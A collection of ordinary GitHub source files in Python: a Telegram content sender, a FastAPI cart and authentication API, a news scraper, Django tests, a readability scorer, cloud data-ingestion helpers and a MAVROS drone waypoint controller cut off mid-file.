+{"seq_id":"29292998994","text":"import io\nimport time\nimport requests\nimport telebot\n\n\nclass Sender:\n\n def __init__(self, CHANNEL_NAME, API_TOKEN, data_folder, flesson, DELAY_TIMER, STOP_STRING, work_course_folder):\n self.CHANNEL_NAME = CHANNEL_NAME\n self.API_TOKEN = API_TOKEN\n self.data_folder = data_folder\n self.flesson = flesson\n self.DELAY_TIMER = DELAY_TIMER\n self.STOP_STRING = STOP_STRING\n self.work_course_folder = work_course_folder\n Sender.sender(self, API_TOKEN, CHANNEL_NAME, flesson, DELAY_TIMER, STOP_STRING, work_course_folder, data_folder)\n\n def sendcontentdoc(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip()\n line_doc = work_course_folder.replace(\"'\", '') + data_folder + cont\n doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n bot.send_document(CHANNEL_NAME.replace(\"'\", ''), doc)\n\n def sendcontentvideo(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip().replace(\"\\n\", \"\")\n line_doc = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") \\\n + data_folder.replace(\"\\n\", \"\").replace(\"'\", '') + cont\n print(line_doc)\n doc = line_doc.replace(\"\\n\", \"\")\n bot.send_video(CHANNEL_NAME, open(doc, 'rb'), width=720, height=1280, timeout=60)\n # , width=720, height=1280, timeout=60\n\n def sendcontentphoto(self, data_folder, cont, CHANNEL_NAME, bot, work_course_folder):\n cont = cont.strip()\n line_doc = work_course_folder.replace(\"'\", '') + data_folder + cont\n doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n\n bot.send_photo(CHANNEL_NAME.replace(\"'\", ''), doc, timeout=60)\n\n def sendcontentmessageHTML(self, cont, CHANNEL_NAME, bot):\n bot.send_message(CHANNEL_NAME.replace(\"\\n\", \"\"), f\"{cont}\", parse_mode='html')\n\n def sendcontentmessage(self, cont, API_TOKEN, CHANNEL_NAME):\n TAKE_ID_CHANNEL = 'https://api.telegram.org/bot' + API_TOKEN.replace(\"\\n\", \"\").replace(\"'\", \"\") \\\n + '/sendMessage?chat_id=' + CHANNEL_NAME.replace(\"\\n\", \"\") + '&text=' + cont\n\n requests.get(TAKE_ID_CHANNEL)\n\n def start_bot(self, API_TOKEN):\n bot1 = telebot.TeleBot(API_TOKEN)\n return bot1\n\n def sender(self, API_TOKEN, CHANNEL_NAME, flesson, DELAY_TIMER, STOP_STRING, work_course_folder, data_folder):\n\n w_script = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") + flesson\n bot = telebot.TeleBot(API_TOKEN.replace(\"'\", \"\"))\n\n with io.open(w_script, encoding='utf-8') as file:\n for line in file:\n\n READ_STRING = str(line)\n if len(line.strip()) == 0:\n\n time.sleep(DELAY_TIMER)\n elif 'wait' in READ_STRING:\n\n Lfile = READ_STRING.split('#')\n split = Lfile[1]\n split.replace(\"\\n\", \"\")\n WAIT_TIMER = int(split) # * 60\n time.sleep(WAIT_TIMER)\n elif READ_STRING == STOP_STRING:\n print('Закончили')\n file.close()\n break\n else:\n if '#' in READ_STRING:\n if 'document' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли документ {cont}')\n self.sendcontentdoc(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n if 'video' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли видео {cont}')\n cont = cont.strip().replace(\"\\n\", \"\")\n # line_doc = work_course_folder.replace(\"'\", '').replace(\"\\n\", \"\") + data_folder + cont\n\n # doc = open(line_doc, 'rb')\n self.sendcontentvideo(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n # doc = open(line_doc.replace(\"\\n\", \"\"), 'rb')\n\n # bot.send_video(CHANNEL_NAME, doc, width=720, height=1280, timeout=60)\n\n if 'photo' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли фото {cont}')\n self.sendcontentphoto(data_folder, cont, CHANNEL_NAME, bot, work_course_folder)\n if 'html' in READ_STRING:\n Lfile = READ_STRING.split('#')\n cont = Lfile[1]\n print(f'Нашли HTML {cont}')\n self.sendcontentmessageHTML(cont, CHANNEL_NAME.replace(\"'\", ''), bot)\n else:\n cont = READ_STRING\n print(f'Нашли текст {cont}')\n self.sendcontentmessage(cont, API_TOKEN.replace(\"'\", ''), CHANNEL_NAME.replace(\"'\", ''))\n return bot\n\n bot.infinity_polling()\n","repo_name":"DocentoFF/web","sub_path":"WebTLMS/webfront/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5878606847","text":"\"\"\"Authentication management implementation.\"\"\"\r\n\r\nfrom fastapi import APIRouter, status, Depends\r\nfrom fastapi_jwt_auth import AuthJWT\r\nimport pydantic\r\nfrom bson.objectid import ObjectId\r\nfrom schemas.authentication import Authentication\r\nfrom schemas.user_profile import UserProfileCategoryInput, UserProfileInput, UserAddressInput\r\nfrom db.mongodb import data_db\r\nfrom utility.api_response import http_exception\r\n\r\n# Fix ObjectId & FastApi conflict\r\npydantic.json.ENCODERS_BY_TYPE[ObjectId] = str\r\n\r\nrouter = APIRouter(tags=[\"Authentication\"])\r\n\r\n\r\n@router.post(\"/authenticate\")\r\nasync def authenticate_user(manage_auth: Authentication,\r\n jwt_token: AuthJWT = Depends()):\r\n user = await data_db.users.find_one(\r\n {\"auth.username\": manage_auth.username,\r\n \"auth.password\": manage_auth.password}\r\n )\r\n\r\n if user:\r\n return {\"Authentication\": \"Success\",\r\n \"access_token\": jwt_token.create_access_token(subject=manage_auth.username)}\r\n else:\r\n raise http_exception(message=\"Check your credentials.\", status=status.HTTP_401_UNAUTHORIZED)\r\n\r\n\r\n@router.put(\"/user-profile/category\")\r\nasync def add_user_favorite(update_info: UserProfileCategoryInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_favorites = user[\"preferences\"][\"category_list\"]\r\n\r\n new_category = update_info.category\r\n\r\n if new_category not in user_favorites:\r\n user_favorites.append(new_category)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.category_list\": user_favorites}}\r\n )\r\n\r\n return user_favorites\r\n\r\n\r\n@router.delete(\"/user-profile/category\")\r\nasync def remove_user_favorite(update_info: UserProfileCategoryInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_favorites = user[\"preferences\"][\"category_list\"]\r\n\r\n new_category = update_info.category\r\n\r\n if new_category in user_favorites:\r\n user_favorites.remove(new_category)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.category_list\": user_favorites}}\r\n )\r\n\r\n return user_favorites\r\n\r\n\r\n@router.put(\"/user-profile/cart/add/{product_uuid}\")\r\nasync def add_product_to_cart(product_uuid: str,\r\n update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n product = await data_db.products.find_one({\"content.product_uuid\": product_uuid})\r\n\r\n if product is not None and product[\"content\"][\"product_count\"] > 0:\r\n if not user_cart.get(product[\"content\"][\"product_category\"]):\r\n user_cart[product[\"content\"][\"product_category\"]] = []\r\n\r\n user_cart[product[\"content\"][\"product_category\"]].append(product)\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.current_cart\": user_cart}}\r\n )\r\n return {\"detail\": f'{product[\"content\"][\"product_name\"]} added to cart.'}\r\n\r\n raise http_exception(message=\"Product not in stock.\", status=status.HTTP_406_NOT_ACCEPTABLE)\r\n\r\n\r\n@router.delete(\"/user-profile/cart/remove/{product_uuid}\")\r\nasync def remove_product_from_cart(product_uuid: str,\r\n update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n product = await data_db.products.find_one({\"content.product_uuid\": product_uuid})\r\n\r\n if product is not None:\r\n if user_cart.get(product[\"content\"][\"product_category\"]):\r\n try:\r\n user_cart[product[\"content\"][\"product_category\"]].remove(product)\r\n\r\n if len(user_cart[product[\"content\"][\"product_category\"]]) == 0:\r\n del user_cart[product[\"content\"][\"product_category\"]]\r\n\r\n except Exception as e:\r\n return {\"detail\": \"Product is not in the cart.\",\r\n \"error\": e}\r\n\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": update_info.username},\r\n {\"$set\":\r\n {\"preferences.current_cart\": user_cart}}\r\n )\r\n return {\"detail\": f'{product[\"content\"][\"product_name\"]} removed from cart.'}\r\n\r\n return {\"detail\": \"Product is not in the cart.\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart\")\r\nasync def get_user_cart(update_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": update_info.username})\r\n\r\n user_cart = user[\"preferences\"][\"current_cart\"]\r\n\r\n return user_cart\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/address\")\r\nasync def validate_user_address(address_info: UserAddressInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": address_info.username})\r\n\r\n if address_info.address is not None:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": address_info.username},\r\n {\"$set\":\r\n {\"preferences.address\": address_info.address, \"validated_address\": True},\r\n }\r\n )\r\n else:\r\n if user[\"preferences\"][\"address\"] is None:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": address_info.username},\r\n {\"$set\":\r\n {\"preferences.address\": address_info.address, \"validated_address\": False},\r\n }\r\n )\r\n\r\n return {\"Authorized\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/payment\")\r\nasync def validate_user_payment(user_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": user_info.username})\r\n\r\n if user[\"preferences\"][\"payment_settings\"] is None or user[\"preferences\"][\"payment_settings\"] == \" \":\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": user_info.username},\r\n {\"$set\":\r\n {\"validated_payment\": False}}\r\n )\r\n\r\n else:\r\n await data_db.users.find_one_and_update(\r\n {\"auth.username\": user_info.username},\r\n {\"$set\":\r\n {\"validated_payment\": True}}\r\n )\r\n\r\n return {\"Authorized\"}\r\n\r\n\r\n@router.post(\"/user-profile/cart/checkout/review-order\")\r\nasync def validate_user_checkout(user_info: UserProfileInput,\r\n jwt_token: AuthJWT = Depends()):\r\n jwt_token.jwt_required()\r\n\r\n user = await data_db.users.find_one({\"auth.username\": user_info.username})\r\n\r\n receipt_result = user[\"validated_payment\"] and user[\"validated_address\"]\r\n\r\n return {\r\n \"confirmed_items\": user[\"preferences\"][\"current_cart\"],\r\n \"address\": user[\"preferences\"][\"address\"],\r\n \"payment\": user[\"preferences\"][\"payment_settings\"],\r\n \"receipt\": receipt_result\r\n }\r\n","repo_name":"diego-pedro/data-management-product-catalog","sub_path":"routers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":7815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"70805044069","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nlink = 'https://news.un.org/en/tags/sdgs'\nquote_link = \"https://api.quotable.io/quotes/random?limit=3\"\ndate_frmt = \"%d %B %Y\"\noutput_frmt = \"%d %b\"\n\nquotes = {}\n\n\ndef get_blogs():\n r = requests.get(link)\n soup = BeautifulSoup(r.content, 'html.parser')\n s = soup.find('div', class_=\"view-content\")\n h = s.find_all('h2', class_=\"node__title\")\n div = s.find_all('div', class_=\"node__content\")\n span = s.find_all('time', class_=\"datetime\")\n\n a_links = []\n headers = []\n descrip = []\n dates = []\n dt = []\n\n for h2 in h:\n a_tag = h2.find('a') # Find the tag within each element\n if a_tag:\n a_links.append(f\"https://news.un.org{a_tag['href']}\")\n headers.append(a_tag.text)\n for tag in div:\n p = tag.find('p')\n if p:\n descrip.append(p.text)\n for tag in span:\n if tag:\n txt = tag.text\n frmt_date = datetime.strptime(txt, date_frmt)\n formatted_date = frmt_date.strftime(output_frmt)\n dates.append(formatted_date)\n\n for i in range(len(a_links)):\n dt.append([headers[i], descrip[i], a_links[i], dates[i]])\n\n return dt\n\n\ndef get_quote():\n q = requests.get(quote_link)\n q = q.json()\n for i in q:\n quotes[i['content']] = i['author']\n return quotes\n","repo_name":"Mayur-Gowda/WebDev","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10481022092","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom factory import SubFactory\n\nfrom ..factories import (\n ComponentFactory,\n EditorialFactory,\n EmbedFactory,\n ImageFactory,\n ImageWithTextFactory,\n PageFactory,\n QuoteFactory,\n TableFactory,\n)\n\n\nclass TestPageView(TestCase):\n def test_url_resolves(self):\n \"\"\"\"\n URL resolves as expected\n \"\"\"\n page = PageFactory(title='this? is& a! (test*)')\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n self.assertEqual(url, '/this-is-a-test/')\n\n def test_get(self):\n \"\"\"\"\n GET request uses template\n \"\"\"\n page = PageFactory(title='this? is& a! (test*)')\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'pages/page.html')\n\n def test_get_no_page(self):\n \"\"\"\"\n GET request returns a 404 when no page found\n \"\"\"\n url = reverse('page-detail', kwargs={'slug': 'this is a test'})\n\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, 404)\n self.assertTemplateUsed(response, 'error/error.html')\n\n def test_component_editorial(self):\n \"\"\"\"\n GET request returns editorial component as expected\n \"\"\"\n page = PageFactory()\n editorial = EditorialFactory(title='first editorial block',\n component=SubFactory(ComponentFactory,\n page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_editorial = component.editorial\n self.assertEqual(first_editorial, editorial)\n self.assertEqual(first_editorial.title, 'first editorial block')\n\n def test_component_embed(self):\n \"\"\"\"\n GET request returns embed component as expected\n \"\"\"\n page = PageFactory()\n embed = EmbedFactory(title='first embed block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_embed = component.embed\n self.assertEqual(first_embed, embed)\n self.assertEqual(first_embed.title, 'first embed block')\n\n def test_component_image(self):\n \"\"\"\"\n GET request returns image component as expected\n \"\"\"\n page = PageFactory()\n image = ImageFactory(caption='first image block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_image = component.image\n self.assertEqual(first_image, image)\n self.assertEqual(first_image.caption, 'first image block')\n\n def test_component_image_with_text(self):\n \"\"\"\"\n GET request returns image with text component as expected\n \"\"\"\n page = PageFactory()\n image_with_text = ImageWithTextFactory(\n title='first image with text block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_image_with_text = component.image_with_text\n self.assertEqual(first_image_with_text, image_with_text)\n self.assertEqual(first_image_with_text.title,\n 'first image with text block')\n\n def test_component_quote(self):\n \"\"\"\"\n GET request returns quote component as expected\n \"\"\"\n page = PageFactory()\n quote = QuoteFactory(quote='first quote block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_quote = component.quote\n self.assertEqual(first_quote, quote)\n self.assertEqual(first_quote.quote, 'first quote block')\n\n def test_component_table(self):\n \"\"\"\"\n GET request returns table component as expected\n \"\"\"\n page = PageFactory()\n table = TableFactory(title='first table block',\n component=SubFactory(ComponentFactory, page=page))\n\n url = reverse('page-detail', kwargs={'slug': page.get_slug()})\n\n response = self.client.get(url)\n component = response.context['components'].first()\n first_table = component.table\n self.assertEqual(first_table, table)\n self.assertEqual(first_table.title, 'first table block')\n","repo_name":"orangespaceman/tanmt","sub_path":"tanmt/pages/tests/views/test_page_view.py","file_name":"test_page_view.py","file_ext":"py","file_size_in_byte":5153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"25509715749","text":"# Импортируем текст из файла ch1text\r\nimport ch1text\r\n\r\n\r\n# объявляем фукнкцию расчета параметров формулы (функция по вызову функций)\r\ndef computer_readavility(text):\r\n # Объявляем переменные для записи параметров\r\n total_words = 0\r\n total_sentences = 0\r\n total_syllables = 0\r\n score = 0 # Итоговое кол-во баллов\r\n\r\n # Рассчитываем кол-во слов в тексте\r\n words = text.split()\r\n total_words = len(words)\r\n\r\n # Вызываем функцию расчета кол-ва предложений\r\n total_sentences = count_sentences(text)\r\n\r\n # Вызываем функцию расчета кол-ва слогов\r\n total_syllables = count_syllables(words)\r\n\r\n # Вызываем функцию расчета удобочитаемости\r\n score = compute_readability(total_words, total_sentences, total_syllables)\r\n\r\n # Вызываем функцию с показателями (кому нужно)\r\n #indicators(total_words, total_sentences, total_syllables, score)\r\n \r\n # Вызываем функцию вывода классификации удобночитаемости\r\n output_result(score)\r\n\r\n\r\n# Рассчитываем кол-во предложений в тексте\r\ndef count_sentences(text):\r\n count = 0\r\n terminals = ['.','!','?']\r\n for i in text:\r\n if i in terminals: # Ищем символы завершения предложения\r\n count = count +1\r\n return count\r\n\r\n\r\n# Суммируем получаемые слоги в тексте по каждому слову \r\ndef count_syllables(words):\r\n count = 0\r\n for word in words:\r\n word_count = count_syllables_in_word(word)\r\n count = count + word_count\r\n return count\r\n\r\n\r\n# Расситываем кол-во слогов в тексте\r\ndef count_syllables_in_word(word):\r\n count = 0\r\n processed_word = word\r\n\r\n # Проверяем, является ли последний символ в строке знаком\r\n if processed_word[-1] in '.,;:!?': \r\n processed_word = processed_word[0:-1]\r\n \r\n # Проверяем, является ли последний символ в строке буквой eE,\r\n # которые не являются слогом в конце слова\r\n if processed_word[-1] in 'eE': \r\n processed_word = processed_word[0:-1]\r\n\r\n # Если кол-во символов в слове меньше или равно 3, то возвращаем значение\r\n if len(processed_word) <= 3:\r\n return 1\r\n\r\n # объявляем список гласных\r\n vowels = 'aeiouAEIOU'\r\n prev_char_was_vowel = False # Переменная для учета предыдущей гласной\r\n\r\n for char in processed_word:\r\n if char in vowels:\r\n if not prev_char_was_vowel:\r\n count = count + 1\r\n prev_char_was_vowel = True\r\n else:\r\n prev_char_was_vowel = False\r\n\r\n # Если последний символ строки является yY, то увеличиваем счетчик слогов\r\n if processed_word[-1] in 'yY':\r\n count = count +1\r\n \r\n return count\r\n\r\n\r\n# Фунция расчета удобночитаемости\r\ndef compute_readability(total_words, total_sentences, total_syllables):\r\n score = (206.835-1.015*(total_words/total_sentences)\r\n - 84.6*(total_syllables/total_words))\r\n return score\r\n\r\n# Функция вывода итоговой классификации\r\ndef output_result (score):\r\n if score>= 90:\r\n print('Уровень 5-го классаы')\r\n elif score>= 80:\r\n print('Уровень 6-го класса')\r\n elif score>= 70:\r\n print('Уровень 7-го класса')\r\n elif score>= 60:\r\n print('Уровень 8-9-го классов')\r\n elif score>= 50:\r\n print('Уровень 10-11-го классов')\r\n elif score>= 30:\r\n print('Уолвень студента вуза')\r\n else:\r\n print('Уровень выпускника вуза')\r\n\r\n# Вывод показателей расчетов\r\ndef indicators(total_words, total_sentences, total_syllables, score):\r\n print(total_words, 'слов')\r\n print(total_sentences, 'предложений')\r\n print(total_syllables,'слогов')\r\n print(score,'- удобочитаемость')\r\n\r\n\r\n# Передаем текст на оценку в начальный метод! \r\ncomputer_readavility(ch1text.text)\r\n\r\n\r\n \r\n\r\n","repo_name":"Dogodaev/pyton_lessons","sub_path":"ch6/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"25611564621","text":"# Given n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n# Above is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n# The largest rectangle is shown in the shaded area, which has area = 10 unit.\n\n# Example:\n\n# Input: [2,1,5,6,2,3]\n# Output: 10\n\nclass Solution(object):\n def largestRectangleArea(self, heights):\n \"\"\"\n :type heights: List[int]\n :rtype: int\n \"\"\"\n if len(heights) == 0:\n return 0\n hq = [heights[0]]\n cq = [1]\n ans = heights[0]\n for i in range(1, len(heights)):\n if heights[i] == heights[i-1]:\n cq[-1] += 1\n elif heights[i] < heights[i-1]: #decrease\n ans = decr(heights, i, hq, cq, ans)\n else:\n hq.append(heights[i])\n cq.append(1)\n ans = summ(hq, cq, ans)\n return ans\n\n \ndef decr(heights, i, hq, cq, ans):\n h = heights[i]\n accum = 0\n while len(hq) != 0:\n if hq[-1] > h:\n accum += cq[-1]\n cq.pop()\n ans = max(ans, hq[-1]*accum)\n hq.pop()\n else:\n break\n hq.append(h)\n cq.append(accum+1)\n return ans\n \n \ndef summ(hq, cq, ans):\n accum = 0\n #while len(hq) != 0:\n # h, count = hq.pop()\n for i in reversed(range(len(hq))):\n accum += cq[i]\n ans = max(ans, hq[i]*accum)\n return ans\n \n \n","repo_name":"ruizhang84/LeetCode","sub_path":"largestRectangleArea.py","file_name":"largestRectangleArea.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39392846004","text":"import boto3\n\nglue_client = boto3.client('glue')\n\ndef handler(event, context):\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n json_input = 's3://' + bucket + '/' + key\n glue_client.start_job_run(JobName='json-to-pq-first',\n Arguments={'--json_input': json_input})\n","repo_name":"mariusfeteanu/sogdian-web-analytics","sub_path":"code/lambda/json2pq.py","file_name":"json2pq.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"17426513321","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module contains the functions for solving the data ingestion task.\nTask Description:\n Download files from GitHub in batches of a certain size.\n\"\"\"\nimport pickle\nfrom typing import Dict\nfrom types import SimpleNamespace\n\nfrom google.cloud import storage\n\nfrom code.ingest.utils import get_batches, fn_parallel\nfrom code.utils.utils import time_execution, get_project_root\n\n\ndef download_batches_from_bucket(destination: str, source: str, batches: Dict) -> None:\n \"\"\"\n Downloads the batches from the target source bucket using Google Python Libraries.\n :param destination: The target destination.\n :param source: The target source.\n :param batches: The batches data structure.\n :return: None.\n \"\"\"\n # Setup bucket\n client = storage.Client.create_anonymous_client()\n bucket = client.bucket(bucket_name=source, user_project=None)\n for batch, _ in batches.items():\n fn_calls = []\n for _, v in batches[batch].items():\n blob = storage.Blob(v['path'], bucket)\n fn_calls.append(blob.download_to_filename(filename=get_project_root() + '/' + destination + v['path'],\n client=client))\n fn_parallel(*fn_calls)\n\n\n@time_execution\ndef data_ingestion(config: SimpleNamespace) -> None:\n \"\"\"\n Executes the solution of first task.\n :param config: The configuration file from the initial .yaml.\n :type config: SimpleNamespace.\n :return: None.\n \"\"\"\n # Create or get batches.\n if config.get(\"use_cached\"):\n with open(get_project_root() + config.get(\"file_path\"), 'rb') as fh:\n batches = pickle.load(fh)\n else:\n batches = get_batches(user=config.get(\"user\"),\n repo=config.get(\"repo\"),\n batch_size=config.get(\"batch_size\"),\n save_tree=config.get(\"save_tree\"),\n tree_path=config.get(\"file_path\"),\n repo_url=config.get(\"repo_url\"))\n\n # Download files into target destination folder.\n download_batches_from_bucket(destination=config.get(\"sink\"),source=config.get(\"source\"), batches=batches)\n return None\n","repo_name":"skoett/de-assignment_v2","sub_path":"code/ingest/gcp_ingestion.py","file_name":"gcp_ingestion.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"36395454414","text":"import flask\nimport limits.storage\n\nfrom app.parallel_limiter import set_redis_concurrent_lock\nfrom app.session import RedisSessionStore\n\n\ndef initialize_redis_services(app: flask.Flask, redis_url: str):\n if redis_url.startswith(\"redis://\") or redis_url.startswith(\"rediss://\"):\n storage = limits.storage.RedisStorage(redis_url)\n app.session_interface = RedisSessionStore(storage.storage, storage.storage, app)\n set_redis_concurrent_lock(storage)\n elif redis_url.startswith(\"redis+sentinel://\"):\n storage = limits.storage.RedisSentinelStorage(redis_url)\n app.session_interface = RedisSessionStore(\n storage.storage, storage.storage_slave, app\n )\n set_redis_concurrent_lock(storage)\n else:\n raise RuntimeError(\n f\"Tried to set_redis_session with an invalid redis url: ${redis_url}\"\n )\n","repo_name":"simple-login/app","sub_path":"app/redis_services.py","file_name":"redis_services.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":4235,"dataset":"github-code","pt":"71"}
+{"seq_id":"28815206488","text":"#!/usr/bin/env python3\n\"\"\"\n * File: offb_node.py\n * Stack and tested in Gazebo 9 SITL\n\"\"\"\n\nfrom geometry_msgs.msg import PoseStamped\nfrom mavros_msgs.msg import State\nfrom mavros_msgs.srv import CommandBool, CommandBoolRequest, SetMode, SetModeRequest\n\nimport threading\nimport time\n\n# ROS\nimport rospy\n\nfrom std_msgs.msg import Int16\n# MAVROS\nfrom mavros_msgs.msg import OverrideRCIn\n# from mavros_msgs.srv import CommandBool\nfrom mavros_msgs.msg import WaypointList, WaypointReached\n\nfrom mavros_msgs.srv import WaypointPush, WaypointPull, WaypointClear, WaypointSetCurrent\n# from mavros_msgs.srv import *\nfrom mavros_msgs.srv import ParamGet\n\nfrom mavros_msgs.srv import CommandLong\n\n# from mavros_msgs.srv import ParamSet, SetMode\n# TODO Missing import from mavros_msgs.srv import WaypointGOTO\n# from mavros.mission import *\n\n\ncurrent_state = State()\n\n\ndef state_cb(msg):\n global current_state\n current_state = msg\n\n\n# Globals\nTHROTTLE_CHANNEL = 2\nSTEER_CHANNEL = 0\n\nEXEC_TIME = 1 # exc time in secs\n\n\nclass UAV_Control:\n \"\"\"UAV WP and Manual Control\"\"\"\n\n def __init__(self):\n self.lock = threading.Lock()\n # mavros.set_namespace(\"/mavros\")\n self.waypoint_list = None\n self.current_waypoint = None\n\n # Proxies\n rospy.wait_for_service('/mavros/param/get')\n self.svc_get_param = rospy.ServiceProxy('/mavros/param/get', ParamGet)\n\n rospy.wait_for_service('/mavros/mission/push')\n self.svc_push_waypoints = rospy.ServiceProxy('/mavros/mission/push', WaypointPush)\n\n rospy.wait_for_service('/mavros/mission/pull')\n self.svc_pull_waypoints = rospy.ServiceProxy('/mavros/mission/pull', WaypointPull)\n\n rospy.wait_for_service('/mavros/mission/clear')\n self.svc_clear_waypoints = rospy.ServiceProxy('mavros/mission/clear', WaypointClear)\n\n rospy.wait_for_service('/mavros/mission/set_current')\n self.svc_set_current_waypoint = rospy.ServiceProxy(\n 'mavros/mission/set_current',\n WaypointSetCurrent)\n\n rospy.wait_for_service('/mavros/cmd/command')\n self._srv_cmd_long = rospy.ServiceProxy(\n '/mavros/cmd/command', CommandLong, persistent=True)\n\n # Publishers\n self.pub_rc_override = rospy.Publisher(\n 'mavros/rc/override', OverrideRCIn, queue_size=10)\n\n # Subscribers\n self.sub_waypoints = rospy.Subscriber(\n \"/mavros/mission/waypoints\",\n WaypointList, self.__waypoints_cb)\n\n self.sub_current = rospy.Subscriber(\n \"/mavros/mission/reached\", WaypointReached,\n self.__current_cb)\n\n def __waypoints_cb(self, topic):\n self.lock.acquire()\n try:\n self.waypoint_list = topic.waypoints\n finally:\n self.lock.release()\n\n def __current_cb(self, waypoint_reached):\n rospy.loginfo('__current_cb: ')\n rospy.loginfo('__current_cb: %d', waypoint_reached.wp_seq)\n self.lock.acquire()\n try:\n self.current_waypoint = waypoint_reached.wp_seq\n wp = self.waypoint_list[self.current_waypoint]\n cone_alt = wp.z_alt\n (q, r) = divmod(cone_alt, 2)\n if r == 1:\n rospy.set_param(\"/CONE_ON_GRASS\", True)\n rospy.loginfo('Cone is on grass')\n else:\n rospy.set_param(\"/CONE_ON_GRASS\", False)\n rospy.loginfo('Cone is not on grass')\n except:\n rospy.loginfo(\"Failed to get current waypoint details\")\n # Make a safe bet\n rospy.set_param(\"/CONE_ON_GRASS\", True)\n finally:\n self.lock.release()\n\n def print_waypoints(self):\n \"\"\"Prints Pixhawk waypoints to stdout\"\"\"\n for seq, waypoint in enumerate(self.waypoint_list):\n print(' seq: ' + str(seq) +\n ' waypoint.is_current: ' + str(waypoint.is_current) +\n ' waypoint.autocontinue: ' + str(waypoint.autocontinue) 